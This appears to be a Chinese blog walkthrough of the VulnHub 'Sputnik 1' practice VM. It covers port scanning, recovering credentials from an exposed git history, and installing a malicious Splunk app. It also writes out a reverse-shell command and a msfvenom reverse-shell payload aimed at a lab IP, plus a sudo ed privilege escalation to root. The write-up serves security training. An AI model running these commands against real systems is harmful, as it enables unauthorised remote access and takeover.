当前位置: 首页 > news >正文

vulnhub-Sputnik 1靶机

vulnhub:https://www.vulnhub.com/entry/sputnik-1,301/

导入靶机,放在kali同网段,扫描

image-20240927164246670

靶机在192.168.114.135,扫描端口

image-20240927164617346

开了三个端口,访问

8089的功能基本都要账户访问

image-20240927164731993

55555端口是个小游戏

image-20240927164918495

之前nmap还找到了一个目录/.git,其中的logs目录下的一个文件让我们去克隆一个项目

https://github.com/ameerpornillos/flappy

image-20240927165036709

61337是个登录界面

image-20240927165153335

克隆项目

git clone https://github.com/ameerpornillos/flappy

查看日志

git log

一一查看日志,最后找到在07fda135aae22fa7869b3de9e450ff7cacfbc717

image-20240927165943355

git ls-tree 07fda135aae22fa7869b3de9e450ff7cacfbc717

image-20240927170057056

git show f4385198ce1cab56e0b2a1c55e8863040045b085

image-20240927170116914

是账户名和密码

sputnik:ameer_says_thank_you_and_good_job

之前有个登陆界面,尝试登陆,成功

image-20240927170207118

通过在网上查找,这个splunk有一个利用工具

https://github.com/TBGSecurity/splunk_shells

下载,然后上传到kali,在网站内安装

image-20240927170540488

image-20240927170553616

image-20240927170605194

image-20240927170629348

上传完成后重新启动

image-20240927170646217

再次登录会直接来到软件管理界面,设置软件权限

image-20240927170816952

image-20240927170835942

设置完成后来到网站的搜索框,输入反弹shell命令

| revshell std 192.168.114.128 6789

image-20240927170958340

kali开启监听,获取到shell

image-20240927171405146

想要执行sudo -l得先获取交互式shell,使用msfvenom生成payload

msfvenom -p cmd/unix/reverse_python lhost=192.168.114.128 lport=9876 R

image-20240927171925894

监听9876端口,在原有的shell运行payload,获取到新的shell后生成交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

image-20240927172723408

sudo -l显示我们可以使用ed,查找漏洞网站使用方式

image-20240927172804215

只需要在ed里输入!/bin/bash

image-20240927172858081

提权成功,flag在/root文件夹


http://www.mrgr.cn/news/44729.html

相关文章:

  • Kubernetes系列之一快速部署一套K8s集群(kubeadm方式)
  • 如何写出Pythonic的代码?
  • 二进制,八进制,十进制,十六进制 之间的转换
  • 开源2+1链动S2B2C商城小程序下社区团长的社群温度营造与商业价值实现
  • 稀缺是否意味着价值
  • CSS圆角
  • 服务无法启动
  • ubuntu ssh远程执行k8s命令报错the connection to the server localhost:8080 was refused
  • 一文带你了解linux内核IRQ子系统init过程
  • 【Iceberg分析】Spark与Iceberg集成落地实践(一)
  • springboot aop判定用户ip访问次数受限了该如何通知用户
  • C#-委托delegate
  • SafeEar:AI 音频伪造检测的崭新时代
  • 日本数据保护要求
  • 【IC】基于systemverilog(UVM)断言
  • YoloV10改进策略:BackBone改进|CAFormer在YoloV10中的创新应用,显著提升目标检测性能
  • 【含文档】基于Springboot+Android的个人财务系统的设计与实现(含源码+数据库+lw)
  • 家庭用超声波清洗机好用吗?推荐四款性能绝佳的超声波清洗机!
  • shell脚本中for循环的用法
  • 多模态大模型调研BLIP、BLIP2、InstructBLIP